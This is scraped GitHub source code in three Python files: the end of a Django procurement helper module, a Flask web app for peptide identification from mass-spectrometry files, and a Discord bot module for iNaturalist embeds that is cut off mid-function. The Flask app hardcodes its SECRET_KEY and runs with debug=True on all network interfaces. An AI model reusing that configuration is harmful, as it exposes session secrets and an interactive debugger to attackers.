value=None):\n try:\n prf = PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n raise ValidationError('Purchase Requisition matching id does not exist')\n else:\n setattr(prf, field_name, value)\n prf.save()\n\n\ndef update_obj_field(model_cls=None, identifier_field=None,\n identifier_value=None, field_name=None, value=None):\n try:\n model_obj = model_cls.objects.get(**{f'{identifier_field}': identifier_value})\n except model_cls.DoesNotExist:\n raise ValidationError(f'{model_cls} matching id does not exist')\n else:\n setattr(model_obj, field_name, value)\n model_obj.save()\n\n\ndef get_prf_field(prf_number=None, field_name=None):\n try:\n prf = PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n raise ValidationError('Purchase Requisition matching id does not exist')\n else:\n return getattr(prf, field_name, None)\n\n\ndef user_signature(user):\n try:\n signature = Signature.objects.get(owner=user)\n except Signature.DoesNotExist:\n raise ValidationError(\n 'Authorising person does not have signature captured, please '\n 'contact admin for assistance on this.')\n else:\n return signature.signature\n\n\ndef is_purchase_requisition(prf_number):\n try:\n PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n return False\n else:\n return True\n\n\ndef is_purchase_order(order_number):\n try:\n PurchaseOrder.objects.get(order_number=order_number)\n except PurchaseOrder.DoesNotExist:\n return False\n else:\n return True\n\n","repo_name":"Botswana-Harvard-Utility-Systems/procurement","sub_path":"procurement/models/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40140584878","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains the Spectra Flask Application application.\"\"\"\n\nimport logging\nimport time\nfrom pathlib import Path\nimport pandas as pd\nfrom pyopenms import *\nimport os\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import Flask, render_template, request, redirect, url_for, flash, session\nfrom werkzeug.utils import secure_filename\n\nfrom project_spectra.Parse_data_MS2 import parse_data_from_MS2\nfrom project_spectra.Spec_peptide import Peptide_identification\nfrom project_spectra.identifier import Identifier\n\nlog = logging.getLogger(__name__)\n\n# Constants\nALLOWED_EXTENSIONS = {'mzml', 'fasta', 'fa'}\n\n# Create upload folder\nupload_folder = Path(Path.home(), '.projectSpectra', 'uploads')\nPath.mkdir(upload_folder, exist_ok=True)\nUPLOAD_FOLDER = str(upload_folder)\n\n\n\"\"\"Create the Flask application\"\"\"\n\nt = time.time()\n\napp = Flask(__name__)\n\nFLASK_PORT = os.environ.get('FLASK_PORT', default=5000)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\napp.config['SECRET_KEY'] = \"1P313P4OO138O4UQRP9343P4AQEKRFLKEQRAS230\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///spectra.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Initialize the database\ndb = SQLAlchemy(app)\nlog.info('Done building %s in %.2f seconds', app, time.time() - t)\n\n\n\"\"\"Build URLs\"\"\"\n\n@app.route(\"/\")\n@app.route(\"/start\")\ndef start():\n\treturn render_template(\"start.html\")\n\n# Home\n@app.route(\"/home\", methods=['GET', 'POST'])\ndef home():\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tfilenames = next(os.walk(UPLOAD_FOLDER), (None, 
None, []))[2] # Get files\n\tfilenames = [file for file in filenames]\n\t# Check files are uploaded\n\tif filenames:\n\t\texp = MSExperiment()\n\t\tMzMLFile().load(ms2_file, exp)\n\t\tsize = len(exp.getSpectra())\n\treturn render_template('home.html', size = size, my_info =\"\", data_table =\"\",\n\t\t\t\t\t\t p_mz ='', p_c =\"\", number_of_peak = \"-\", min_m_z = \"-\",\n\t\t\t\t\t\t\tmax_m_z = \"-\", max_m_z_peak = \"-\")\n\n# Generate MS summary\n@app.route('/parse', methods=['POST'])\ndef parse_spec():\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tfilenames = next(os.walk(UPLOAD_FOLDER), (None, None, []))[2] # Get files\n\tfilenames = [file for file in filenames]\n\t# Check files are uploaded\n\tif filenames:\n\t\tscan_number = request.form['textbox']\n\t\texp = MSExperiment()\n\t\tMzMLFile().load(ms2_file, exp)\n\t\tm_z = list(exp.getSpectrum(int(scan_number)).get_peaks()[0])\n\t\tintensity = list(exp.getSpectrum(int(scan_number)).get_peaks()[1])\n\n\t\tnumber_of_peak = len(m_z)\n\t\tmin_m_z = round(min(m_z), 2)\n\t\tmax_m_z_peak = round(m_z[intensity.index(max(intensity))], 2)\n\t\tmax_m_z = round(max(m_z), 2)\n\n\t\tprecursor_mz = parse_data_from_MS2(ms2_file, int(scan_number))[2]\n\t\tprecursor_charge = parse_data_from_MS2(ms2_file, int(scan_number))[3]\n\n\t\treturn render_template('home.html', p_mz = precursor_mz, p_c = precursor_charge,\n\t\t\t\t\t\t\t number_of_peak = number_of_peak, min_m_z = min_m_z,\n\t\t\t\t\t\t\t max_m_z = max_m_z, max_m_z_peak = max_m_z_peak)\n\telse:\n\t\tupload_info = \"Please check, no file is uploaded!\"\n\t\treturn render_template('home.html', upload_info = upload_info)\n\n# Plot figure for specific scan\n@app.route('/plot.png', methods=['GET', 'POST'])\ndef plot_png():\n\t\"\"\"Generate the de-isotoped plot of MS2 scan.\"\"\"\n\tfrom project_spectra.Spec_peptide import Peptide_identification\n\timport matplotlib.pyplot as plt\n\timport io\n\timport base64\n\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tscan_number = request.form['textbox']\n\tp = Peptide_identification(ms2_file, int(scan_number))\n\tp.store_one_scan_and_get_deisotoped()\n\texp = MSExperiment()\n\tMzMLFile().load(p.deisotoped_file, exp)\n\tfor spec in exp:\n\t\tfor mz, i in zip(*spec.get_peaks()):\n\t\t\tplt.plot([mz, mz], [0, i], color='black')\n\t\t\tplt.text(mz, i, str(mz))\n\n\t\t# for the title add RT and Precursor m/z and charge info if available\n\t\ttitle = ''\n\t\tif spec.getRT() >= 0:\n\t\t\ttitle += 'RT: ' + str(spec.getRT())\n\t\tif len(spec.getPrecursors()) >= 1:\n\t\t\ttitle += ' Precursor m/z: ' + str(spec.getPrecursors()[0].getMZ()) + ' Charge: ' + str(spec.getPrecursors()[0].getCharge())\n\t\tplt.title(title)\n\t\tplt.ylabel('intensity')\n\t\tplt.xlabel('m/z')\n\t\tplt.ylim(bottom=0)\n\n\timg = io.BytesIO()\n\tplt.savefig(img, format='png')\n\tplt.close()\n\timg.seek(0)\n\tplot_url = base64.b64encode(img.getvalue()).decode('utf8')\n\treturn render_template('plot.html', plot_url=plot_url)\n\n# Determine peptides possible\n@app.route('/peptide', methods=['POST'])\ndef get_peptide_list():\n\t\"\"\"get peptide list\"\"\"\n\tms2_file = os.path.join(app.config['UPLOAD_FOLDER'], \"ms2.mzML\")\n\tscan_number = request.form['textbox']\n\tp = Peptide_identification(ms2_file, int(scan_number))\n\n\ttry:\n\t\tvals = p.compile(show_C_terminal=False)[0]\n\t\tpeaks = p.compile(show_C_terminal=False)[1]\n\t\tsum_intensity = p.compile(show_C_terminal=False)[2]\n\t\tlst = zip(vals, sum_intensity)\n\t\tshow_seq_peak = 
zip(vals,peaks)\n\t\tresult_p = pd.DataFrame(lst, columns=[\"Sequence\", \"Sum of Relative Peak Intensity\"], dtype=float)\n\t\tresult_delete_duplicate = result_p.drop_duplicates()\n\t\tdata_table_html = result_delete_duplicate.to_html(header=\"true\", table_id=\"table\", index=False, justify=\"justify\", )\n\t\tsession['peptides'] = list(set(vals))\n\t\treturn render_template('home.html', data_table_html=data_table_html, show_seq_peak=show_seq_peak, error_info=\"\")\n\texcept:\n\t\terror_info = \"N/C terminal are not found by the algorithm or no enough AA to match, try another scan number :) \"\n\t\treturn render_template('home.html', error_info=error_info)\n\n# About\n@app.route(\"/about\")\ndef about():\n\treturn render_template(\"about.html\")\n\n# Upload\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n\tif request.method == 'POST':\n\t\tfile = request.files.get('file')\n\t\tclearAllFlag = request.values.get(\"clearall\")\n\n\t\t# if the clear all button is pressed\n\t\tif clearAllFlag:\n\t\t\tclear_all()\n\t\t\tflash('Uploaded files successfully removed', \"info\")\n\t\t\treturn redirect(url_for('upload'))\n\n\t\t# if a file was uploaded\n\t\telif file:\n\t\t\t# if user does not select file, browser also\n\t\t\t# submit an empty part without filename\n\t\t\tif file.filename == '':\n\t\t\t\tflash('No file selected', \"warning\")\n\t\t\t\treturn redirect(url_for('home'))\n\n\t\t\tif file and allowed_file(file.filename):\n\t\t\t\tfilename = secure_filename(file.filename)\n\t\t\t\tfile.save(Path(app.config['UPLOAD_FOLDER'], filename))\n\t\t\t\tprint(file)\n\t\t\t\tflash(f\"File uploaded successfully: '{file.filename}'\", \"info\")\n\t\t\t\treturn redirect(url_for('home'))\n\t\t\telse:\n\t\t\t\tflash(f\"File could not be saved: '{file.filename}'\", \"warning\")\n\t\t\t\treturn redirect(url_for('upload'))\n\n\t\t# if no file was selected\n\t\telse:\n\t\t\tflash(\"Error! No file selected.\", \"warning\")\n\t\t\treturn redirect(url_for('upload'))\n\telse:\n\t\treturn render_template(\"upload.html\")\n\n\ndef allowed_file(filename):\n\treturn '.' 
in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef clear_all():\n\tfor root, dirs, files in os.walk(UPLOAD_FOLDER):\n\t\tfor file in files:\n\t\t\tos.remove(os.path.join(root, file))\n\treturn\n\n# Compute Protein Matches\n@app.route(\"/proteins\")\ndef protein_matches():\n\t# Run protein identification\n\tif session['peptides']:\n\t\ti = Identifier(sequence=session['peptides'])\n\t\tresult = i.stout\n\n\t\tname = []\n\t\tfull_name = []\n\t\torganism = []\n\t\tfor x, y in result.items():\n\t\t\tname.append(x)\n\t\t\tfull_name.append(y[0])\n\t\t\torganism.append(y[1])\n\t\tdata = {'Accession Number': name, 'Fullname': full_name, 'Organism': organism}\n\t\tdf = pd.DataFrame(data)\n\t\tdata_table_html = df.to_html(header=\"true\", table_id=\"table\", index=False, justify=\"justify\")\n\t\treturn render_template(\"proteins.html\", results = data_table_html)\n\telse:\n\t\terror_info = \"No protein identified.\"\n\t\treturn render_template(\"proteins.html\", info = error_info)\n\n\n'''\n Run app\n'''\nif __name__ == \"__main__\":\n\tflask_port = int(os.environ.get('FLASK_PORT', '5005'))\n\tapp.run(host='0.0.0.0', port=flask_port, debug=True)\n #app.run(host='127.0.0.1', port=5005, debug=True)","repo_name":"danqi123/De_novo_seq-peptide_identification","sub_path":"frontend/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31018942739","text":"\"\"\"Module to handle iNat embed concerns.\"\"\"\r\nimport asyncio\r\nimport contextlib\r\nimport copy\r\nfrom io import BytesIO\r\nimport logging\r\nimport re\r\nfrom typing import Optional, Union\r\nfrom urllib.parse import parse_qs, urlsplit\r\n\r\nimport discord\r\nfrom discord import DMChannel, File\r\nfrom dronefly.core.constants import RANK_LEVELS\r\nfrom dronefly.core.formatters.constants import WWW_BASE_URL\r\nfrom dronefly.core.formatters.generic import (\r\n format_taxon_name,\r\n format_taxon_names,\r\n format_user_link,\r\n LifeListFormatter,\r\n ObservationFormatter,\r\n QualifiedTaxonFormatter,\r\n TaxonFormatter,\r\n)\r\nfrom dronefly.core.utils import lifelists_url_from_query_response, obs_url_from_v1\r\nfrom dronefly.core.parsers.url import (\r\n MARKDOWN_LINK,\r\n PAT_OBS_LINK,\r\n PAT_OBS_QUERY,\r\n PAT_OBS_TAXON_LINK,\r\n PAT_TAXON_LINK,\r\n)\r\nfrom dronefly.core.query.query import EMPTY_QUERY, Query, QueryResponse, TaxonQuery\r\nfrom dronefly.discord.embeds import (\r\n format_taxon_names_for_embed,\r\n make_image_embed,\r\n make_taxa_embed,\r\n MAX_EMBED_DESCRIPTION_LEN,\r\n MAX_EMBED_FILE_LEN,\r\n)\r\nfrom pyinaturalist.constants import ROOT_TAXON_ID\r\nfrom pyinaturalist.models import Place, Taxon, User\r\nfrom redbot.core.commands import BadArgument, Context\r\nfrom redbot.core.utils.predicates import MessagePredicate\r\n\r\nfrom ..embeds.common import (\r\n add_reactions_with_cancel,\r\n make_embed,\r\n NoRoomInDisplay,\r\n)\r\nfrom ..interfaces import MixinMeta\r\nfrom ..maps import INatMapURL\r\nfrom ..projects import UserProject\r\nfrom ..taxa import (\r\n format_place_taxon_counts,\r\n format_user_taxon_counts,\r\n get_taxon,\r\n TAXON_COUNTS_HEADER,\r\n TAXON_COUNTS_HEADER_PAT,\r\n TAXON_PLACES_HEADER,\r\n TAXON_PLACES_HEADER_PAT,\r\n TAXON_NOTBY_HEADER,\r\n TAXON_NOTBY_HEADER_PAT,\r\n TAXON_IDBY_HEADER,\r\n TAXON_IDBY_HEADER_PAT,\r\n)\r\nfrom ..utils import get_lang, has_valid_user_config\r\n\r\nlogger = logging.getLogger(\"red.dronefly.\" + 
__name__)\r\n\r\nHIERARCHY_PAT = re.compile(r\".*?(?=>)\", re.DOTALL)\r\nNO_TAXONOMY_PAT = re.compile(r\"(\\n__.*)?$\", re.DOTALL)\r\nSHORT_DATE_PAT = re.compile(\r\n r\"(^.*\\d{1,2}:\\d{2}(:\\d{2})?(\\s+(am|pm))?)(.*$)\", flags=re.I\r\n)\r\nTAXONOMY_PAT = re.compile(r\"in:(?P.*?(?=\\n__.*$)|.*$)\", re.DOTALL)\r\n\r\nOBS_ID_PAT = re.compile(r\"\\(.*/observations/(?P\\d+).*?\\)\")\r\nPLACE_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]place_id=(?P\\d+).*?\\)\"\r\n)\r\nUNOBSERVED_BY_USER_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]unobserved_by_user_id=(?P\\d+).*?\\)\",\r\n)\r\nID_BY_USER_ID_PAT = re.compile(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[\\?\\&]ident_user_id=(?P\\d+).*?\\)\",\r\n)\r\nUSER_ID_PAT = re.compile(r\"\\n\\[[0-9 \\(\\)]+\\]\\(.*?[\\?\\&]user_id=(?P\\d+).*?\\)\")\r\n\r\nREACTION_EMOJI = {\r\n \"self\": \"\\N{BUST IN SILHOUETTE}\",\r\n \"user\": \"\\N{BUSTS IN SILHOUETTE}\",\r\n \"home\": \"\\N{HOUSE BUILDING}\",\r\n \"place\": \"\\N{EARTH GLOBE EUROPE-AFRICA}\",\r\n \"taxonomy\": \"\\N{REGIONAL INDICATOR SYMBOL LETTER T}\",\r\n}\r\nTAXON_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"self\", \"user\", \"taxonomy\"]))\r\nNO_PARENT_TAXON_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"self\", \"user\"]))\r\nTAXON_PLACE_REACTION_EMOJIS = list(\r\n map(REACTION_EMOJI.get, [\"home\", \"place\", \"taxonomy\"])\r\n)\r\nNO_PARENT_TAXON_PLACE_REACTION_EMOJIS = list(map(REACTION_EMOJI.get, [\"home\", \"place\"]))\r\nOBS_REACTION_EMOJIS = NO_PARENT_TAXON_REACTION_EMOJIS\r\nOBS_PLACE_REACTION_EMOJIS = NO_PARENT_TAXON_PLACE_REACTION_EMOJIS\r\n\r\n# pylint: disable=no-member, assigning-non-slot\r\n# - See https://github.com/PyCQA/pylint/issues/981\r\n\r\n\r\nclass INatEmbed(discord.Embed):\r\n \"\"\"Base class for INat embeds.\"\"\"\r\n\r\n taxon_url: str = None\r\n obs_url: str = None\r\n taxonomy: str = None\r\n params: dict = {}\r\n\r\n @classmethod\r\n def from_discord_embed(cls, embed: discord.Embed):\r\n \"\"\"Create an iNat embed from a discord.Embed.\"\"\"\r\n return cls.from_dict(embed.to_dict())\r\n\r\n @classmethod\r\n def from_dict(cls, data: dict):\r\n \"\"\"Create an iNat embed from a dict.\"\"\"\r\n inat_embed = super(cls, INatEmbed).from_dict(data)\r\n inat_embed.obs_url = inat_embed.get_observations_url()\r\n inat_embed.taxon_url, taxon_id = inat_embed.get_taxon_url()\r\n inat_embed.taxonomy = inat_embed.get_taxonomy()\r\n inat_embed.params = inat_embed.get_params(taxon_id)\r\n return inat_embed\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.obs_url = self.get_observations_url()\r\n self.taxon_url, taxon_id = self.get_taxon_url()\r\n self.taxonomy = self.get_taxonomy()\r\n self.params = self.get_params(taxon_id)\r\n\r\n def get_observations_url(self):\r\n \"\"\"Return observations url, if present.\"\"\"\r\n if self.url:\r\n if re.match(PAT_OBS_QUERY, self.url):\r\n return self.url\r\n if self.description:\r\n mat_single_obs = re.search(PAT_OBS_LINK, self.description)\r\n if mat_single_obs:\r\n return mat_single_obs[\"url\"]\r\n # Could be observations search, e.g. first link in description\r\n # of a taxon display. PAT_OBS_QUERY is greedy so cannot be used\r\n # against description! 
Match the first link first, and then the\r\n # obs query within it.\r\n mat_first_link = (\r\n re.search(MARKDOWN_LINK, self.description) if self.description else None\r\n )\r\n if mat_first_link:\r\n mat = re.search(PAT_OBS_QUERY, mat_first_link[\"url\"])\r\n if mat:\r\n return mat[\"url\"]\r\n return None\r\n\r\n def get_taxon_url(self):\r\n \"\"\"Return taxon url and the taxon_id in it, if present.\"\"\"\r\n if self.url:\r\n mat = re.match(PAT_TAXON_LINK, self.url)\r\n if mat:\r\n return (mat[\"url\"], mat[\"taxon_id\"])\r\n if self.description:\r\n mat_taxon = re.search(PAT_TAXON_LINK, self.description)\r\n if mat_taxon:\r\n return (mat_taxon[\"url\"], mat_taxon[\"taxon_id\"])\r\n return (None, None)\r\n\r\n def get_taxonomy(self):\r\n \"\"\"Return taxonomy for the embed.\"\"\"\r\n if not self.description:\r\n return \"\"\r\n mat = re.search(TAXONOMY_PAT, self.description)\r\n if mat:\r\n return mat[\"taxonomy\"]\r\n return \"\"\r\n\r\n def get_params(self, taxon_id=None):\r\n \"\"\"Return recognized params for the embed.\"\"\"\r\n url = self.obs_url or self.taxon_url or self.url\r\n if self.params or not url:\r\n return self.params\r\n\r\n params = parse_qs(urlsplit(url).query)\r\n # TODO: we should leave these as-is and use urlencode with doseq=True\r\n # instead to put the URL back together later\r\n new_params = {key: \",\".join(params[key]) for key in params}\r\n if taxon_id:\r\n new_params[\"taxon_id\"] = taxon_id\r\n return new_params\r\n\r\n def inat_content_as_dict(self):\r\n \"\"\"Return iNat content from embed as dict.\"\"\"\r\n content = dict()\r\n content[\"listed_id_by_user_ids\"] = self.listed_id_by_user_ids()\r\n content[\"listed_not_by_user_ids\"] = self.listed_not_by_user_ids()\r\n content[\"listed_place_ids\"] = self.listed_place_ids()\r\n content[\"listed_user_ids\"] = self.listed_user_ids()\r\n content[\"listed_observation_ids\"] = self.listed_observation_ids()\r\n content[\"place_id\"] = self.place_id()\r\n content[\"taxon_id\"] = self.taxon_id()\r\n content[\"user_id\"] = self.user_id()\r\n content[\"unobserved_by_user_id\"] = self.unobserved_by_user_id()\r\n content[\"not_user_id\"] = self.not_user_id()\r\n content[\"ident_user_id\"] = self.ident_user_id()\r\n content[\"project_id\"] = self.project_id()\r\n content[\"taxon_url\"] = self.taxon_url\r\n content[\"obs_url\"] = self.obs_url\r\n content[\"params\"] = self.params\r\n content[\"taxonomy\"] = self.taxonomy\r\n content[\"query\"] = str(self.query())\r\n return content\r\n\r\n def query(self, query: Query = EMPTY_QUERY): # Query\r\n \"\"\"Produce a query from embed, merging new query if given.\"\"\"\r\n\r\n main = None\r\n if query.main and query.main.terms and query.main.terms[0] == \"any\":\r\n main = query.main\r\n if not main and self.taxon_id():\r\n main = TaxonQuery(taxon_id=self.taxon_id())\r\n user = query.user or self.user_id()\r\n id_by = query.id_by or self.ident_user_id()\r\n unobserved_by = query.unobserved_by or self.unobserved_by_user_id()\r\n except_by = query.except_by or self.not_user_id()\r\n place = query.place or self.place_id()\r\n project = query.project or self.project_id()\r\n controlled_term = query.controlled_term or self.controlled_term()\r\n query = Query(\r\n main=main,\r\n user=user,\r\n id_by=id_by,\r\n unobserved_by=unobserved_by,\r\n except_by=except_by,\r\n place=place,\r\n project=project,\r\n controlled_term=controlled_term,\r\n )\r\n return query\r\n\r\n def has_users(self):\r\n \"\"\"Embed has a user counts table.\"\"\"\r\n return 
bool(re.search(TAXON_COUNTS_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_id_by_users(self):\r\n \"\"\"Embed has an id by user counts table.\"\"\"\r\n return bool(re.search(TAXON_IDBY_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_not_by_users(self):\r\n \"\"\"Embed has a not by user counts table.\"\"\"\r\n return bool(re.search(TAXON_NOTBY_HEADER_PAT, self.description or \"\"))\r\n\r\n def has_observations(self):\r\n \"\"\"Embed has listed observations (e.g. from `[p]search obs`).\"\"\"\r\n return bool(re.search(OBS_ID_PAT, self.description or \"\"))\r\n\r\n def has_places(self):\r\n \"\"\"Embed has a place counts table.\"\"\"\r\n # prevent misdetect as 'not by' (unobserved_by_user_id=# can have a place filter applied)\r\n return bool(re.search(TAXON_PLACES_HEADER_PAT, self.description or \"\"))\r\n\r\n def listed_id_by_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_id_by_users():\r\n return None\r\n\r\n return [int(id) for id in re.findall(ID_BY_USER_ID_PAT, self.description)]\r\n\r\n def listed_not_by_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_not_by_users():\r\n return None\r\n\r\n return [\r\n int(id) for id in re.findall(UNOBSERVED_BY_USER_ID_PAT, self.description)\r\n ]\r\n\r\n def listed_observation_ids(self):\r\n \"\"\"Return listed observations, if present.\"\"\"\r\n if not self.has_observations():\r\n return None\r\n\r\n return [int(id) for id in re.findall(OBS_ID_PAT, self.description)]\r\n\r\n def listed_place_ids(self):\r\n \"\"\"Return listed places, if present.\"\"\"\r\n if not self.has_places():\r\n return None\r\n\r\n return [int(id) for id in re.findall(PLACE_ID_PAT, self.description)]\r\n\r\n def listed_user_ids(self):\r\n \"\"\"Return listed users, if present.\"\"\"\r\n if not self.has_users():\r\n return None\r\n\r\n return [int(id) for id in re.findall(USER_ID_PAT, self.description)]\r\n\r\n def place_id(self):\r\n \"\"\"Return place_id(s) from embed, if present.\"\"\"\r\n place_id = self.params.get(\"place_id\")\r\n return int(place_id) if place_id else None\r\n\r\n def project_id(self):\r\n \"\"\"Return project_id(s) from embed, if present.\"\"\"\r\n project_id = self.params.get(\"project_id\")\r\n return int(project_id) if project_id else None\r\n\r\n def taxon_id(self):\r\n \"\"\"Return taxon_id(s) from embed, if present.\"\"\"\r\n taxon_id = self.params.get(\"taxon_id\")\r\n return int(taxon_id) if taxon_id else None\r\n\r\n def controlled_term(self):\r\n term_id = self.params.get(\"term_id\")\r\n if not term_id:\r\n return None\r\n term_value_id = self.params.get(\"term_value_id\")\r\n if not term_value_id:\r\n return str(term_id)\r\n return \"{} {}\".format(term_id, term_value_id)\r\n\r\n def user_id(self):\r\n \"\"\"Return user_id(s) from embed, if present.\"\"\"\r\n user_id = self.params.get(\"user_id\")\r\n return int(user_id) if user_id else None\r\n\r\n def unobserved_by_user_id(self):\r\n \"\"\"Return unobserved_by_user_id(s) from embed, if present.\"\"\"\r\n unobserved_by_user_id = self.params.get(\"unobserved_by_user_id\")\r\n return int(unobserved_by_user_id) if unobserved_by_user_id else None\r\n\r\n def not_user_id(self):\r\n \"\"\"Return not_user_id(s) from embed, if present.\"\"\"\r\n not_user_id = self.params.get(\"not_user_id\")\r\n return int(not_user_id) if not_user_id else None\r\n\r\n def ident_user_id(self):\r\n \"\"\"Return ident_user_id(s) from embed, if present.\"\"\"\r\n ident_user_id = self.params.get(\"ident_user_id\")\r\n return 
int(ident_user_id) if ident_user_id else None\r\n\r\n\r\n# TODO: refactor these two helpers as a single context manager so we can\r\n# supply custom emoji sets in the context block.\r\ndef _add_place_emojis(query_response: QueryResponse, is_taxon_embed: bool = False):\r\n if not query_response:\r\n return False\r\n if is_taxon_embed:\r\n return query_response.place and not query_response.user\r\n return query_response.place and not (\r\n query_response.user or query_response.id_by or query_response.unobserved_by\r\n )\r\n\r\n\r\n# Note: always call this after _add_place_emojis\r\ndef _add_user_emojis(query_response: QueryResponse):\r\n if not query_response:\r\n return True\r\n return not query_response.except_by\r\n\r\n\r\nEMOJI = {\r\n \"research\": \":white_check_mark:\",\r\n \"needs_id\": \":large_orange_diamond:\",\r\n \"casual\": \":white_circle:\",\r\n \"fave\": \":star:\",\r\n \"comment\": \":speech_left:\",\r\n \"community\": \":busts_in_silhouette:\",\r\n \"image\": \":camera:\",\r\n \"sound\": \":sound:\",\r\n \"ident\": \":label:\",\r\n}\r\n\r\n\r\n# Note: Consider broadening scope of module to INatHelpers to encompass things\r\n# like check_taxon_query, or else split to own mixin.\r\nclass INatEmbeds(MixinMeta):\r\n \"\"\"Provide embeds for iNatCog.\"\"\"\r\n\r\n def check_taxon_query(self, ctx, query):\r\n \"\"\"Check for valid taxon query.\"\"\"\r\n if not isinstance(query, Query):\r\n return\r\n if not query.main:\r\n args = ctx.message.content.split(\" \", 1)[1]\r\n reason = (\r\n \"I don't understand that query.\\nPerhaps you meant one of:\\n\"\r\n f\"`{ctx.clean_prefix}tab {args}`\\n\"\r\n f\"`{ctx.clean_prefix}obs {args}`\\n\"\r\n f\"`{ctx.clean_prefix}search obs {args}`\"\r\n )\r\n raise BadArgument(reason)\r\n\r\n async def make_last_obs_embed(self, ctx, last):\r\n \"\"\"Return embed for recent observation link.\"\"\"\r\n if last.obs:\r\n obs = last.obs\r\n embed = await self.make_obs_embed(ctx, obs, url=last.url, preview=False)\r\n else:\r\n embed = make_embed(url=last.url)\r\n mat = re.search(PAT_OBS_LINK, last.url)\r\n obs_id = int(mat[\"obs_id\"])\r\n logger.debug(\"Observation not found for link: %d\", obs_id)\r\n embed.title = \"No observation found for id: %d (deleted?)\" % obs_id\r\n\r\n shared_by = f\"· shared {last.ago}\"\r\n if last.name:\r\n shared_by += f\" by @{last.name}\"\r\n embed.description = (\r\n f\"{embed.description}\\n\\n{shared_by}\" if embed.description else shared_by\r\n )\r\n return embed\r\n\r\n async def make_map_embed(self, ctx, taxa, missing_taxa=None, lang=None):\r\n \"\"\"Return embed for an observation link.\"\"\"\r\n lang = await get_lang(ctx)\r\n title = format_taxon_names_for_embed(\r\n taxa, with_term=True, names_format=\"Range map for %s\", lang=lang\r\n )\r\n inat_map_url = INatMapURL(self.api)\r\n url = await inat_map_url.get_map_url_for_taxa(taxa)\r\n embed = make_embed(title=title, url=url)\r\n if missing_taxa:\r\n embed.set_footer(\r\n text=f\"Some taxa could not be found and were ignored: {','.join(missing_taxa)}\"\r\n )\r\n return embed\r\n\r\n @contextlib.asynccontextmanager\r\n async def sound_message_params(\r\n self, channel, sounds: list, embed: discord.Embed, index=0\r\n ):\r\n \"\"\"Given a sound URL, yield params to send embed with file (if possible) or just URL.\"\"\"\r\n if not sounds:\r\n yield None\r\n return\r\n sound = sounds[index]\r\n if isinstance(channel, DMChannel):\r\n url_only = False\r\n max_embed_file_size = MAX_EMBED_FILE_LEN\r\n else:\r\n url_only = not 
channel.permissions_for(channel.guild.me).attach_files\r\n # Boosts could make this > default 8M maximum (95% due to overhead)\r\n max_embed_file_size = channel.guild.filesize_limit * 0.95\r\n sound_io = None\r\n\r\n async with self.api.session.get(sound.url) as response:\r\n try:\r\n filename = response.url.name\r\n sound_bytes = await response.read()\r\n except OSError:\r\n filename = None\r\n sound_bytes = None\r\n\r\n _embed = make_embed()\r\n title = \"Sound recording\"\r\n if len(sounds) > 1:\r\n title += f\" ({index + 1} of {len(sounds)})\"\r\n if filename:\r\n title += f\": {filename}\"\r\n _embed.title = title\r\n _embed.url = sound.url\r\n _embed.set_footer(text=sound.attribution)\r\n embeds = [embed, _embed]\r\n _params = {\"embeds\": embeds}\r\n\r\n if not url_only:\r\n if len(sound_bytes) <= max_embed_file_size:\r\n sound_io = BytesIO(sound_bytes)\r\n\r\n if sound_io:\r\n _params[\"file\"] = File(sound_io, filename=filename)\r\n yield _params\r\n sound_io.close()\r\n return\r\n\r\n yield _params\r\n\r\n async def summarize_obs_spp_counts(self, taxon, obs_args):\r\n observations = await self.api.get_observations(per_page=0, **obs_args)\r\n if observations:\r\n species = await self.api.get_observations(\r\n \"species_counts\", per_page=0, **obs_args\r\n )\r\n observations_count = observations[\"total_results\"]\r\n species_count = species[\"total_results\"]\r\n url = obs_url_from_v1(obs_args)\r\n species_url = obs_url_from_v1({**obs_args, \"view\": \"species\"})\r\n if taxon and RANK_LEVELS[taxon.rank] <= RANK_LEVELS[\"species\"]:\r\n summary_counts = f\"Total: [{observations_count:,}]({url})\"\r\n else:\r\n summary_counts = (\r\n f\"Total: [{observations_count:,}]({url}) \"\r\n f\"Species: [{species_count:,}]({species_url})\"\r\n )\r\n return summary_counts\r\n return \"\"\r\n\r\n def make_life_list_embed(self, formatter: LifeListFormatter):\r\n \"\"\"Return embed for life list.\"\"\"\r\n query_response = formatter.query_response\r\n embed = make_embed(title=f\"Life list {query_response.obs_query_description()}\")\r\n if query_response.user:\r\n embed.url = lifelists_url_from_query_response(query_response)\r\n embed.description = formatter.format_page(0)\r\n last_page = formatter.last_page() + 1\r\n if last_page > 1:\r\n embed.set_footer(text=f\"Page 1/{last_page}\")\r\n return embed\r\n\r\n async def make_obs_counts_embed(self, query_response: 